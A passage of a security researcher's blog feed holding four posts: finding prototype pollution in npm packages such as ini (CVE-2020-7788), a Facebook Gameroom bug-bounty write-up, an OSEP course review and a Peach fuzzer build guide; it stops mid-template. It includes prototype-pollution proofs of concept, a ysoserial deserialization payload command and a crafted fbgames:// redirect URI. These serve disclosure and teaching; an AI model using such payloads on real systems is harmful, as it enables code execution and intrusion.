❌

Normal view

There are new articles available, click to refresh the page.
Before yesterdayspaceraccoon.dev

Supply Chain Pollution: Hunting a 16 Million Download/Week npm Package Vulnerability for a CTF Challenge

23 December 2020 at 15:29

Background

GovTech's Cyber Security Group recently organised the STACK the Flags Cybersecurity Capture-the-Flag (CTF) competition from 4th to 6th December 2020. For the web domain, my team wanted to build challenges that addressed real-world issues we have encountered during penetration testing of government web applications and commercial off-the-shelf products.

From my experience, a significant number of vulnerabilities arise from developers' lack of familiarity with third-party libraries that they use in their code. If these libraries are compromised by malicious actors or applied in an insecure manner, developers can unknowingly introduce devastating weaknesses in their applications. The SolarWinds supply chain attack is a prime example of this.

As one of the most popular programming languages for web developers, the Node.js ecosystem has had its fair share of issues with third-party libraries. The Node package manager, better known as npm, serves more than one hundred billion packages per month and hosts close to one-and-a-half million packages. Part of what makes package managers so huge is the tree-like dependency structure. Every time you install a package in your project, you also install that package's dependencies, and their dependencies, and so onβ€Š-β€Šsometimes ending up with dozens of packages!

npm's recent statistics.

If a single dependency in this chain is compromised or vulnerable, it can lead to cascading effects on the entire ecosystem. In 2018, a widely-used npm package, event-stream, was taken over by a malicious author who added bitcoin-stealing code targeting the Copay bitcoin wallet. Even though the attacker had a single target in mind, the popular event-stream package was downloaded nearly 8 million times in 2.5 months before the malicious code was discovered. In 2019, I presented a tool called npm-scan at Black Hat Asia that sought to identify malicious packages, but it was clear that npm needed to resolve this systematically. Thankfully, the npm ecosystem has improved significantly since then, including the release of the npm audit feature and more active monitoring.

Hunting NPM Package Vulnerabilities

With this context in mind, I set out to design a challenge that used a vulnerable npm package. Additionally, I wanted to exploit a prototype pollution vulnerability. To put it simply, prototype pollution involves overwriting the properties of Javascript objects in an application by polluting the objects' prototypes. For example, if I overwrote the toString property of an object and printed that object with console.log, it would output my overwritten value instead of the actual string representation of that object. This can lead to critical issues depending on the applicationβ€Š-β€Šimagine what would happen if I overwrote the isAdmin property of a user object to always be true! Nevertheless, as the impact of prototype pollution remains dependent on the application context, few know how to properly exploit it.

Next, I applied two tactics to find npm packages that were vulnerable to prototype pollution: pattern matching and functionality grouping.

Pattern Matching

When vulnerable code is written, it often falls into recognisable patterns that can be captured by static scanners. This forms the basis of many tools such as GitHub's CodeQL, which scans open source codebases for unsafe code patterns. While scanners are used defensively to discover vulnerabilities ahead of time, attackers can also perform their own pattern matching to discover unreported vulnerabilities in open source code.

My tool of choice was grep.app, a speedy regex search engine that trawls over half a million public repositories on GitHub. Since most npm packages host their code on GitHub, I felt confident that it would uncover at least a few vulnerable packages. The next step was to identify a useful regex pattern. I looked up previously-disclosed prototype pollution vulnerabilities in npm packages and found a January 2020 Snyk advisory for the dot-prop package. Next, I checked the GitHub commit that patched the vulnerability.

dot-prop's code diff.

dot-prop patched the prototype pollution vulnerability by blacklisting the following keys:

const disallowedKeys = [
	'__proto__',
	'prototype',
	'constructor'
];

Here, there was no obvious code pattern that was inherently vulnerable; it was the lack of a blacklist that made it vulnerable. I decided to zoom out a little and focus on what dot-prop did that required a blacklist in the first place. According to the package description, dot-prop is a package to get, set, or delete a property from a nested object using a dot path.

For example, I could set a propety like so:

// Setter
const object = {foo: {bar: 'a'}};
dotProp.set(object, 'foo.bar', 'b');
console.log(object); // {foo: {bar: 'b'}}

However, the following proof-of-concept would trigger a prototype pollution using dot-prop's set function:

const object = {};
console.log("Before " + object.b); // Undefined
dotProp.set(object, '__proto__.b', true);
console.log("After " + {}.b); // true

This worked because the function of dot-prop was to parse a dotted path string as keys in an object and set the values of those keys. Based on what we know about prototype pollution, this is inherently dangerous unless certain keys are blacklisted.

After considering this, I decided to search for patterns that matched other dotted path parsers. dot-prop used path.split('.') to split up dotted paths, although I later discovered that key.split('.') was commonly used by other packages as well. With this approach, I discovered several vulnerable packages, but this required me to manually inspect each package's code to verify if a blacklist was used. Additionally, not all dotted path parsers used key or path to denote the dotted path string, so I probably missed out on many more.

grep.app search with JavaScript filter.

Functionality Grouping

I realised that a better approach would be to group npm packages based on their functionalityβ€Š-β€Šin the previous case, dotted path parsers. This is because such functionality is unsafe by default unless appropriate blacklists or safeguards are put in place. After looking through the dotted path parsers, I stumbled on a far more prolific group of packagesβ€Š-β€Šconfiguration file parsers.

Configuration files come in various formats such as YAML, JSON, and more. Out of these, TOML and INI are very similar and match this format:

[foo]
bar = "baz"

A typical INI parser would parse this file into the following object:

iniParser.parse(fs.readFileSync('./config.ini', 'utf-8')) // { foo: { bar: 'baz' } }

However, unless the parser sets up a blacklist, the following config file would lead to prototype pollution:

[__proto__]
polluted = "polluted"

However, unless the parser uses a blacklist, the following configuration file would lead to prototype pollution:

iniParser.parse(fs.readFileSync('./payload.ini', 'utf-8')) // { }
console.log(parsed.__proto__) // { polluted: 'polluted' }
console.log({}.polluted) // polluted
console.log(polluted) // polluted

Indeed, prototype pollution vulnerabilities have been reported in such parsers previously, but only on an ad-hoc basis. I built my proof-of-concept code to quickly test packages at scale, then used npm's search function to discover other parsers. The search function supports searching by tags such as keywords:toml or keywords:toml-parser, allowing me to quickly discover multiple vulnerable packages.

One of these was ini, a simple INI parser with a staggering sixteen million downloads per week:

ini downloads statistics.

This is because almost 2000 dependent packages use ini, including the npm CLI itself! Since npm comes packaged with each default Node.js installation, this means that every user of Node.js was downloading the vulnerable ini package as well. Other notable dependents include the Angular CLI and sodium-native, a wrapper around the libsodium cryptography library. While these packages included ini as a dependency, their risk depended on how ini was used; if they did not call the vulnerable function, the vulnerability would not be triggered.

Packages that depend on ini.

Although I did not use ini for the challenge, I made sure to responsibly disclose the list of vulnerable packages to npm.

Responsible Disclosure

npm supports a robust responsible disclosure process, including a currently-on-hold vulnerability disclosure program. The open source security company Snyk also provides a simple vulnerability disclosure form, which I used to coordinate the disclosures. Fortunately, the disclosure process for ini went smoothly, with the developer patching the vulnerability in two ddays.

  • December 6, 2020: Initial disclosure to Snyk
  • December 7, 2020: First response from Snyk
  • December 8, 2020: Disclosure to Developer
  • December 10, 2020: Patch issued
  • December 10, 2020: Disclosure published
  • December 11, 2020: CVE-2020–7788 assigned

Other packages are undergoing responsible disclosure or have been disclosed, such as multi-ini.

The vulnerability-hunting process highlighted both the strengths and weaknesses of open source packages. Although open source packages written by third parties can be analysed for vulnerabilities or compromised by malicious actors, developers can also quickly find, report, and patch the vulnerabilities. It remains the responsibility of the organisations and developers to vet packages before using them. While not everyone can afford the resources needed to inspect the code directly, there are free tools such as Snyk Advisor that use metrics such as update frequency and contribution history to estimate a package's health. Developers should also vet new versions of packages, especially if they were written by a different author or published at an irregular timing.

In the long run, there are no easy answers to open source package security. Nevertheless, organisations can apply sensible measures to effectively secure their projects.

P.S. One of our participants, Yeo Quan Yang, posted an excellent write-up on the challenge that illustrated the intended solution to chain a prototype pollution in a package with a remote code execution gadget in a templating engine. Check it out here!

Applying Offensive Reverse Engineering to Facebook Gameroom

2 February 2021 at 17:03

Late last year, I was invited to Facebook's Bountycon event, which is an invitation-only application security conference with a live-hacking segment. Although participants could submit vulnerabilities for any Facebook asset, Facebook invited us to focus on Facebook Gaming. Having previously tested Facebook's assets, I knew it was going to be a tough challenge. Their security controls have only gotten tougher over the years – even simple vulnerabilities such as cross-site scripting are hard to come by, which is why they pay out so much for those. As such, top white hat hackers tend to approach Facebook from a third-party software angle, such as Orange Tsai's well-known MobileIron MDM exploits.

Given my limited time (I also started late due to an administrative issue), I decided to stay away from full-scale vulnerability research and focussed on simple audits of Facebook Gaming's access controls. However, both the mobile and web applications were well-secured, as one would expect. After a bit of digging, I came across Facebook Gameroom, a Windows-native client for playing Facebook games. I embarked on an illuminating journey of applying offensive reverse engineering to a native desktop application.

Facebook Gameroom, Who Dis?

If you haven't heard about Facebook Gameroom, you're probably not alone. Released in November 2016, Gameroom was touted as a Steam competitor that supports Unity, Flash, and more recently HTML5 games. However, in recent years Facebook has turned its attention to its mobile and web platforms, especially with the rise of streaming. In fact, Gameroom is scheduled to be decommissioned in June this year. Fortunately for me, it was still alive and kicking at the time of the event.

Facebook Gameroom

The first thing I noticed was that Gameroom did not require any elevated permissions to install. It appeared to be a staged installer, where a minimal installer pulls additional files from the web instead of a monolithic installer. Indeed, I quickly found the installation directory at C:\Users\<USERNAME>\AppData\Local\Facebook\Games, since most user-level applications are placed in the C:\Users\<USERNAME>\AppData folder. The folder contained lots of .dll files as well as several executables. A few things stood out to me:

  1. Gameroom came with its own bundled 7zip executable (7z.exe and 7z.dll), which was possibly outdated and vulnerable.
  2. Gameroom stored user session data in Cookies SQLite database, which presented an attractive target for attackers.
  3. Gameroom included the CefSharp library (CefSharp.dll), which after further research turned out to be an embedded Chromium-based browser for C#.

The third point suggested to me that Gameroom was written in the .NET framework. The .NET framework allows programmes to be compiled into Common Intermediate Language (CIL) code instead of machine code, which can run in a Common Language Runtime application virtual machine. There are several benefits to this, including greater interoperability and portability of .NET applications. However, it is also a lot easier to decompile these applications back into near-source code since they are compiled as CIL rather than pure machine code.

For .NET assemblies, DNSpy is the de-facto standard. Reverse engineers can easily debug and analyze .NET applications with DNSpy, including patching them live. I popped FacebookGameroom.exe into DNSpy and got to work.

A Wild Goose Chase: Searching for Vulnerable Functions

I began by searching for vulnerable or dangerous functions such as unsafe deserializations. If you've done the Offensive Security Advanced Web Attacks and Exploitation course, you would be intimately familiar with deserialization attacks. I won't go into detail about them here, but just know that it involves converting data types into easily-transportable formats and back, which can lead to critical vulnerabilities if handled badly. For example, Microsoft warns against using BinaryFormatter in its code quality analyzer with a pretty stark BinaryFormatter is insecure and can't be made secure.

Unfortunately, BinaryFormatter popped up in my search for the β€œDeserialize” string.

System.Runtime.Serialization.Formatters.Binary.BinaryFormatter

However, I needed to find the vulnerable code path. I right-clicked the search result, selected β€œAnalyze”, then worked up the β€œUsed By” chain to locate where Gameroom used BinaryFormatter.Deserialize.

Used By Chain

Eventually, this led me to the System.Configuration.ApplicationSettingsBase.GetPreviousVersion(string) and System.Configuration.ApplicationSettingsBase.GetPropertyValue(string) functions. Gameroom used the deserialization function to retrieve its application settings at startup – but from where? Looking back at the installation folder, I found fbgames.settings, which turned out to be a serialized blob. As such, if I injected a malicious deserialization payload into this file, I could obtain code execution. Before that, however, I needed to find a deserialization gadget. With a bit more searching based on a list of known deserialization gadgets, I discovered that Gameroom used the WindowsIdentity class.

With that, I worked out a code execution proof-of-concept:

  1. Using the ysoserial deserialization attack tool, I generated my code execution payload with ysoserial.exe -f BinaryFormatter -g WindowsIdentity -o raw -c "calc" -t > fbgames.settings.
  2. Next, I copied fbgames.settings to C:\Users\<YOUR USERNAME>\AppData\Local\Facebook and replaced the original file. No admin privileges were required since it was located in a user directory.
  3. Finally, I opened Facebook Gameroom and calculator popped!

Although it was exciting to get code execution, upon further discussion with the Facebook team we agreed that this did not fit their threat model. Since Gameroom executes as a user-level applications, there's no opportunity to escalate privileges. Additionally, since overwriting the file required some level of access (e.g. via a malicious Facebook game that would require approval to be listed publicly), there was no viable remote attack vector.

I learned an important lesson in the different threat landscape posed by native applications – search for a viable remote attack vector first before diving into the code-level vulnerabilities.

Scheming My Way to Success

Have you ever clicked on a link from an email and magically started Zoom? What exactly happened behind the scenes? You just used a custom URI scheme, which allows you to open applications like any other link on the web. For example, Zoom registers the zoommtg: URI scheme and parses links like zoommtg:zoom.us/join?confno=123456789&pwd=xxxx&zc=0&browser=chrome&uname=Betty.

Similarly, I noticed that Gameroom used a custom URI scheme to automatically open Gameroom after clicking a link from the web browser. After searching through the code, I realized that Gameroom checked for the fbgames: URI scheme in FacebookGames\Program.cs:

private static void OnInstanceAlreadyRunning()
{
    Uri uri = ArgumentHelper.GetLaunchScheme() ?? new Uri("fbgames://");
    if (SchemeHelper.GetSchemeType(uri) == SchemeHelper.SchemeType.WindowsStartup)
    {
        return;
    }
    NativeHelpers.BroadcastArcadeScheme(uri);
}

If Gameroom had been opened with the fbgames:// URI, it would proceed to parse it in the SchemeHelper class:

public static SchemeHelper.SchemeType GetSchemeType(Uri uri)
{
if (uri == (Uri) null)
return SchemeHelper.SchemeType.None;
string host = uri.Host;
if (host == "gameid")
return SchemeHelper.SchemeType.Game;
if (host == "launch_local")
return SchemeHelper.SchemeType.LaunchLocal;
return host == "windows_startup" ? SchemeHelper.SchemeType.WindowsStartup : SchemeHelper.SchemeType.None;
}

public static string GetGameSchemeId(Uri uri)
{
if (SchemeHelper.GetSchemeType(uri) != SchemeHelper.SchemeType.Game)
return (string) null;
string str = uri.AbsolutePath.Substring(1);
int num = str.IndexOf('/');
int length = num == -1 ? str.Length : num;
return str.Substring(0, length);
}

If the URI had the gameid host, it would parse it with SchemeHelper.SchemeType.Game. If it used the launch_local host, it would parse it with SchemeHelper.SchemeType.LaunchLocal. I started with the promising launch_local path, tracing it to FacebookGames.SchemeHelper.GenLocalLaunchFile(Uri):

public static async Task<string> GenLocalLaunchFile(Uri uri)
{
    string result;
    if (SchemeHelper.GetSchemeType(uri) != SchemeHelper.SchemeType.LaunchLocal || uri.LocalPath.Length <= 1)
    {
        result = null;
    }
    else if (!(await new XGameroomCanUserUseLocalLaunchController().GenResponse()).CanUse)
    {
        result = null;
    }
    else
    {
        string text = uri.LocalPath.Substring(1);
        result = ((MessageBox.Show(string.Format("Are you sure you want to run file\n\"{0}\"?", text), "Confirm File Launch", MessageBoxButtons.YesNo) == DialogResult.Yes) ? text : null);
    }
    return result;
}

Unfortunately, it appeared that even though I could launch any arbitrary file in the system through a URI like fbgames://launch_local/C:/evilapp.exe (as documented by Facebook), this would be blocked by a confirmation dialog. I tried to bypass this dialog with format strings and non-standard inputs, but couldn't find a way past it.

I returned to the gameid path, which opened a Facebook URL based on the game ID in the URI. For example, if you wanted to launch Words With Friends in Gameroom, you would visit fbgame://gameid/168378113211268 in a browser and Gameroom would open https://apps.facebook.com/168378113211268 in the native application window.

However, I realized that GetGameSchemeId, which extracted the ID from the URI that would be added to the apps.facebook.com URL, did not actually validate that the slug was a valid ID. As such, an attacker could redirect the native application window to any other page on Facebook.

public static string GetGameSchemeId(Uri uri)
{
if (SchemeHelper.GetSchemeType(uri) != SchemeHelper.SchemeType.Game)
return (string) null;
string str = uri.AbsolutePath.Substring(1);
int num = str.IndexOf('/');
int length = num == -1 ? str.Length : num;
return str.Substring(0, length);
}

For example, fbgame://gameid/evilPage would redirect the Gameroom window to https://apps.facebook.com/evilPage.

But how could I redirect to attacker-controlled code in Gameroom? There were a few options, including abusing an open redirect on apps.facebook.com. Unfortunately, I did not have one on hand at that time. Another way was to redirect to a Facebook Page or ad that allowed embedded iframes with custom code.

At this point, I hit a roadblock. Revisting the code of GetGameSchemeId, it took only the first slug in the URI path, so fbgame://gameid/evilPage/app/123456 would direct the native application window to https://apps.facebook.com/evilPage and discard /app/123456.

Fortunately, there were additional code gadgets I could use. The version of Chrome used in Gameroom was really outdated: 63.0.3239.132 – the current version at the time was 86.0.4240.75. As such, it did not support the new version of Facebook Pages. The classic Facebook Pages version accepted a sk parameter such that https://apps.facebook.com/evilPage?sk=app_123456 led to the custom tab with the attacker-controlled code at https://apps.facebook.com/evilPage/app/123456!

But how could I inject the additional query parameter in my custom scheme? Remember that Gameroom discards anything after the first URL slug, including query parameters. Or does it? Looking back at FacebookGames/SchemeHelper.cs, I found GetCanvasParamsFromQuery:

public static IDictionary<string, string> GetCanvasParamsFromQuery(Uri uri)
{
if (uri == (Uri) null)
return (IDictionary<string, string>) null;
string stringToUnescape;
if (!UriHelper.GetUrlParamsFromQuery(uri.ToString()).TryGetValue("canvas_params", out stringToUnescape))
return (IDictionary<string, string>) null;
string str = Uri.UnescapeDataString(stringToUnescape);
try
{
return JsonConvert.DeserializeObject<IDictionary<string, string>>(str);
}
catch
{
return (IDictionary<string, string>) null;
}
}

Before passing on the custom URI, GetCanvasParamsFromQuery would look for the canvas_params query parameter, serialize it as a JSON dictionary, and convert it into the new URL as query parameters.

This led me to my final payload scheme. fbgames://gameid/evilPage?canvas_params={"sk":"app_123456"} would be parsed by Gameroom into https://apps.facebook.com/evilPage/app/123456 in the native application browser window, which would then execute my custom JavaScript code.

As mentioned earlier, the threat landscape for a native application is very different from a web application. By redirecting the embedded Chrome native window to attacker-controlled Javascript, an attacker could proceed to perform known exploits on the 3-year-old embedded Chromium browser. Although a full exploit had not been publicly released, I was able to leverage the CVE-2018-6056 proof-of-concept code to crash the Chrome engine via a type confusion vulnerability.

Alternatively, an attacker could create pop up boxes that were essentially legitimate native MessageBoxes to perform phishing attacks, or attempt to read the cached credentials file. Fortunately, unlike Electron applications that integrate Node.JS APIs, CefSharp limits API access. However, it still remains vulnerable to Chromium and third-party library vulnerabilities.

Summing Up

Facebook awarded it as High and subsequently patched the vulnerability, pushing me into the top-10 leaderboard for Bountycon. Although Gameroom will be shut down soon, it definitely left me with some fond memories (and practice) in basic offensive reverse engineering. For newcomers to application reverse engineering, Electron, CefSharp, and other browser-based frameworks are a good starting place to test for web-adjacent weaknesses like cross-site scripting and open redirects, while exploiting desktop-only code execution vectors.

#reverseengineering #infosec

Offensive Security Experienced Penetration Tester (OSEP) Review and Exam

11 March 2021 at 09:40

Good Things Come in Threes

In August last year, Offensive Security announced that it was retiring the long-standing Offensive Security Certified Expert (OSCE) certification and replacing it with three courses, each with their own certification. If you get all three, you are also awarded the new Offensive Security Certified Expert – Three (OSCE3) certification.

OSCE3 by Offensive Security

While this is undoubtedly a great business decision by Offensive Security – the market loves bundles – how useful are these courses for security professionals? The first of the three courses, Advanced Web Attacks and Exploitation (WEB-300)/Offensive Security Web Expert (OSWE), was already released at that time and is a known quantity. In October 2020, Offensive Security released the Evasion Techniques and Breaching Defenses (PEN-300) course that comes with the Offensive Security Experienced Penetration Tester (OSEP) certification and more recently released Windows User Mode Exploit Development (EXP-301)/Offensive Security Exploit Developer (OSED). The three courses target specific domains and therefore are relevant to different roles in offensive security.

As I had already achieved the OSWE in 2019, I took the 60-day OSEP package from January to February 2021. At the time of writing, this costs $1299. PEN-300/OSEP teaches Red Team skills – if your job involves network penetration (such as through phishing emails) and subsequently pivoting through Active Directory environments with the occasional Linux server, this is the course for you. If you are mostly working on application penetration testing (think web and mobile apps), OSWE is a better fit. And if you are doing vulnerability research in binaries, OSED will build that foundation.

Overall, I felt that the OSEP was worth the price of admission given the sheer amount of content it throws at you, as well as the excellent labs that will solidify your learning-by-doing. Here's my review along with some tips and tricks to maximize your OSEP experience.

What You Should Know

Before jumping in, Offensive Security recommends the following:

  • Working familiarity with Kali Linux and Linux command line
  • Solid ability in enumerating targets to identify vulnerabilities
  • Basic scripting abilities in Bash, Python, and PowerShell
  • Identifying and exploiting vulnerabilities like SQL injection, file inclusion, and local privilege escalation
  • Foundational understanding of Active Directory and knowledge of basic AD attacks
  • Familiarity with C# programming is a plus

Given that PEN-300 is an advanced course, I definitely recommend getting the OSCP first if you don't have the fundamental skills OSEP requires. Additionally, even though the course says familiarity with C# programming is a plus, I think it's almost a necessity given how much C# features in the course.

What You Will Learn

When it comes to Offensive Security courses, I've come to expect a main dish of core knowledge along with a grab-bag of funky side dishes. While PEN-300 dives deep into core penetration testing skills such as antivirus evasion and Active Directory enumeration, it also includes a bunch of extras such as kiosk hacking (think airport internet terminals or digital mall directories), DNS exfiltration, and more. You never know when you might need this knowledge, but I felt that this sometimes comes at the cost of depth. In particular, I felt that the Linux sections were noticeably sparser than the Windows ones; looking at bash histories or Vim configurations isn't exactly groundbreaking.

On the other hand, OSEP is extremely good when it goes deep. I started the course with only a passing knowledge of Active Directory and Windows payloads, but came out confident that I could craft a Word macro or C# executable payload that could evade most antivirus engines and subsequently pivot through the network. In particular, OSEP teaches you about the Windows system APIs that many tools use behind the scenes. So rather than using Mimikatz to dump a credential database, you'll be taught how Mimikatz does this and code it yourself.

As such, you'll be spending a lot of time in Visual Studio coding up your payloads from scratch. I found this experience invaluable in pushing my knowledge beyond OSCP-level practitioner skills into a deep understanding of the Windows environment. The exploits and techniques remain relevant to modern contexts; you'll be working on Windows 10 and Windows Server 2019 boxes most of the time, as well as the latest versions of Linux. The boxes also regularly update their antivirus signatures.

I also really liked how each chapter builds on the previous one. Offensive Security continuously throws additional roadblocks at your initial payload, forcing you to rebuild over and over again. Got an in-memory Meterpreter shell working? Try evading this antivirus! Managed to bypass that? How about beating AppLocker? Got your shell and trying to run some enumeration scripts? Sorry buddy, you have to deal with AMSI. At the end of it all, you'll walk away with a battle-hardened payload and the skills to build it.

What You Should Also Learn By Yourself

Although PEN-300 is fairly modern, it still misses out on some of the latest developments. Additionally, it only mentions tools like BloodHound in passing but doesn't teach you how to use it, which seems like a big omission. As such, I think you should bolster your PEN-300 knowledge with these:

  • BloodHound: Pretty much essential. Learn how to collect BloodHound data with SharpHound, analyze it, and discover lateral movement vectors. PenTest Partners has a great walkthrough and includes the screenshot below.
  • CrackMapExec: Get familiar with this tool and integrate it into your workflow; it'll speed up your lateral movement.
  • Better enumeration scripts: Although PEN-300 recommends a few, I found that I got better coverage by running a few different ones; I like JAWS for Windows and linuxprivchecker for Linux.
  • Other Active Directory lateral movements: HackTricks has a good list.

PenTest Partners BloodHound

Additionally, familiarize yourself with the quirks of your tooling. For example, only certain versions of Mimikatz work on Windows 10 but don't work on others; keep multiple versions on hand in case you are dealing with a different environment.

How I Prepared for the Exam

Given that the OSEP was a new course, I erred on the side of over-preparation:

  • Completed every single Extra Mile challenge
  • Completed all 6 course labs (do them in order from 1 to 6 as they increase in difficulty)
  • Completed several HackTheBox Windows boxes (see below)
  • Worked on the HackTheBox Cybernetics Pro Lab

I found that HTB boxes were not as useful as I expected, given that they were limited to one machine as compared to PEN-300's focus on networks. Here are the boxes I attempted in order of usefulness (most useful first):

  • Forest
  • Active
  • Monteverde
  • Cascade
  • Resolute
  • Mantis
  • Fuse
  • Fulcrum

While they were great for practicing various tools like CrackMapExec, some were a bit too CTF-like, especially towards the end of the list. I found the HackTheBox Pro Lab far more useful; Cybernetics consists of about 28 boxes across several networks and applies a lot of the techniques taught in PEN-300. If you have the cash to spare (it's pretty expensive at 90 pounds for a month + initial set up), I'd say go for it, but it's not necessary.

Additionally, I did some payload preparation before the exam. Make sure to collect all the payloads you have written throughout the course and have them ready to deploy. Write down the scripts, commands, and tools you were taught throughout the course and know how to use them. Since PEN-300 provides the compiled binaries of the tools throughout the labs, I recommend saving them all in one place so that you have a canonical version of Mimikatz or Rubeus that you know will work in the exam environment.

You should also prepare a Windows development virtual machine that uses a shared drive from your Kali machine to easily build and test payloads. Even though the labs and exam provide a development machine, it's a little slow over the VPN. Microsoft provides a free Windows development VM that's perfect for the job.

The exam itself is 48 hours (actually 47 hours 45 minutes) and provides several pathways to pass. As per the exam documentation, you can either compromise the final target machine or compromise enough machines to accumulate 100 points.

I took about half a day to pivot through the network and successfully compromise the final machine. Although it was enough to pass, I spent the next one and a half days attempting other machines for practice and writing my report. In general, I think that the course material itself covers what you need for the exam, There's no need to pay for HackTheBox machines – just do your extra miles and complete all the included labs. Overall, the exam is challenging but not impossible, especially with the multiple ways to pass it. Focus on what you've learned, refine your payloads in advance, and you will be able to do it.

After sending in my report on Monday, I received my pass confirmation email on Friday!

Pass Email

Another One Bytes the Dust

With the OSEP down, I'll be taking on EXP-301/OSED to build my vulnerability research skills. Since most cybersecurity professionals these days have to work in interdisciplinary fields rather than in silos, the Offensive Security Certified Expert – Three bundle makes a lot of sense. At the same time, I think the OSEP stands tall on its own as an advanced Red Team penetration testing course. Whether you're looking to take the next step beyond OSCP into Red Teaming or rounding out your offensive security skills, there's something for you.

#infosec #offensivesecurity #cybersecurity

Life’s a Peach (Fuzzer): How to Build and Use GitLab’s Open-Source Protocol Fuzzer

22 May 2021 at 03:08

Motivation

The Peach protocol fuzzer was a well-known protocol fuzzer whose parent company β€” Peach Tech β€” was acquired in 2020 by GitLab. While Peach Tech had previously released a Community Edition of Peach fuzzer, it lacked many key features and updates found in the commercial editions. Fortunately, GitLab has open-sourced the core protocol fuzzing engine of Peach under the name β€œGitLab Protocol Fuzzer Community Edition,” allowing anyone to build and deploy it. For simplicity, I will refer to the new open-sourced version as Peach Fuzzer.

Peachy

As expected of an early-stage project, the build process is complicated and not well-documented. In addition, first-time users may have trouble understanding how to use the fuzzer. Moreover, GitLab's open-sourced version still lacks important resources such as fuzzing templates, which means you will have to write them on your own.

To that end, this article aims to demonstrate an end-to-end application of Peach Fuzzer, from build to deployment. Look out for a subsequent article where I will touch on the full workflow of finding and exploiting vulnerabilities using Peach Fuzzer.

Building Peach Fuzzer

Although Peach Fuzzer can be built on both Linux and Windows, it appeared that the Linux build flow was broken at the time of writing. As such, I built the application in Windows , for Windows.

I used the latest version of Windows 10 Professional even though Microsoft does provide handy virtual machines for free. Due to the onerous dependency requirements, I highly recommend building Peach Fuzzer in a fresh virtual machine to avoid messing up your own regular setup.

Dependencies

The existing documentation on the GitLab repository lists the following build prerequisites:

  • Python 2.7

  • Ruby 2.3

  • doxygen, java, xmllint, xsltprocx

  • .NET Framework 4.6.1

  • Visual Studio 2015 or 2017 with C++ compilers

  • TypeScript Compiler (tsc) v2.8

  • Intel Pin

Let us go through them one by one.

Python 2.7

Yep, it is already deprecated, but the build flow is explicitly written for 2.7 and is not compatible with Python 3 (I tried). Get the x86-64 MSI installer at https://www.python.org/downloads/release/python-2718/ and install it β€” remember to select the installation option to add it to your PATH! Alternatively, if you already have Python 3 installed, you can continue to install 2.7, and then run Python with py -2.7 <PYTHON COMMANDS>.

Ruby 2.3

While the documentation recommends an outdated version of Ruby, I was fine installing Ruby 2.7.2-1 (x64) from the RubyInstaller download page (without DevKit). Remember to select the option to add this to your PATH. Although you do not need the MSYS2 toolchain, it would not hurt to have it installed.

java, xmllint, xsltprocx

This is a long list and it would be probably tedious to install these dependencies separately. Thankfully, these packages are mostly available via the Chocolatey Windows package manager. Start by installing Chocolatey with the instructions found at https://chocolatey.org/install, then run the following commands in an elevated PowerShell window:

choco install jdk8 choco install xsltproc choco install git

You need to install git as well to clone the Peach Fuzzer repository later.

doxygen

doxygen is a special case β€” you will need to install it from the installer at https://www.doxygen.nl/download.html. After that, edit the PATH environment variable to include C:\Program Files\doxygen\bin.

.NET Framework 4.6.1, Visual Studio 2015 or 2017 with C++ compilers

Here is where things get a bit complicated. Even though the documentation states .NET Framework 4.6.1, it appears that 4.5.1 is necessary as well to prevent the build process from crashing. Since the latest version of Visual Studio is 2019, you cannot download Visual Studio 2017 directly. Go to this download page to get the older versions and create a free Visual Studio Dev Essentials account to access it. Download Visual Studio Community 2017 (version 15.9) and start the installation.

You will be prompted to install the different developer components. I selected the Desktop development with C++ workload. In addition, I chose the .NET Framework 4.6.1 and 4.5.1 SDKs with targeting packs under β€œIndividual components”. You can see a list of my installation components in the right sidebar for your reference.

Visual Studio

Visual Studio Component Installation Screen

TypeScript Compiler

Although tsc appears to be installed by default in Node (by running npx tsc), you will also have to install this globally. Install the LTS version of Node at https://nodejs.org/en/, then run npm install typescript --global in an elevated command prompt and you are all set!

Intel Pin

This is another tricky one. The documentation recommends v3.2 81205 but it is so outdated that the Intel page no longer lists it. You can download them directly from one of these links:

  1. Windows: http://software.intel.com/sites/landingpage/pintool/downloads/pin-3.4-97438-msvc-windows.zip

  2. Linux: http://software.intel.com/sites/landingpage/pintool/downloads/pin-3.2-81205-gcc-linux.tar.gz

  3. MacOS: http://software.intel.com/sites/landingpage/pintool/downloads/pin-3.2-81205-clang-mac.tar.gz

Since you are building for Windows, you only need the Windows version. Open the zip file and copy the pin-3.2-81205-msvc-windows folder to protocol-fuzzer-ce\3rdParty\pin.

Hidden Dependencies

There are a few more dependencies for Peach to work, but they are not listed in the documentation:

  • .NET Framework 4.5.1

  • WinDBG

  • WireShark

  • Visual C++ Redistributable for Visual Studio 2012 Update 4

.NET Framework 4.5.1 can be installed with Visual Studio as described above. To install WinDBG, follow the instructions at https://docs.microsoft.com/en-us/windows-hardware/drivers/debugger/debugger-download-tools. WireShark has a standard installer which you can use without any issues. This will allow you to use the Windows Debugger and packet monitors.

Since Peach Fuzzer uses !exploitable to triage crashes, you will need to install the specific version Visual C++ Redistributable for Visual Studio 2012 Update 4 from https://www.microsoft.com/en-us/download/details.aspx?id=30679. I tested other versions and it only works with the 2012 version.

Build Commands

Finally, it is time to build! Clone the repository and cd into it and run python waf configure (or py -2.7 waf configure in my case). If all goes well, you should see this:

WAF Configure

WAF Configure

If the build fails, it is time to start debugging. I found the error messages from configure helpful as most of the time, the failure is caused by a missing dependency. You can also use the Visual Studio installer to repair your installation in case binaries were removed.

After configuration, run python waf build. This will build your documentation as well as the Windows x86 and x64 variants in protocol-fuzzer-ce\slag. Finally, run python waf install to create the final binaries and output to protocol-fuzzer-ce\output.

WAF Install

WAF Install

As we did not specify the variant for installation, the installer will generate files for both debug and release for x86 and x64. For most purposes, you will want to use the release version of x64; this will be your Peach directory.

Running Peach Fuzzer

Writing Templates

After building Peach Fuzzer, it is time to put it through its paces. Peach Fuzzer is a generational fuzzer β€” this means it generates test cases from user-defined templates. This is especially useful for highly structured file types or protocols with strict checksums and formatting.

I will demonstrate Peach Fuzzer's capabilities by running my template against a small test case: a remote buffer overflow via a HTTP request to Savant Web Server 3.1. It is always good to validate your templates against a known vulnerable application. Although the open-source version of Peach Fuzzer does not come with any built-in templates, there are pretty good templates (known as Pits in Peach) available such as this HTTP Pit.

Before writing your templates, I highly recommend reading the β€œPeach Pro Developer Guide” that is generated in output\doc\sdk\docs as part of the build process. It provides details about the individual components of the templates, as well as the arguments and inputs for the various Peach binaries which I will not be discussing in this article. Now back to testing the template:

I adapted the previous HTTP Pit file into a generic GET HTTP template:

 <?xml version="1.0" encoding="utf-8"?>
    <Peach xmlns="http://peachfuzzer.com/2012/Peach" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
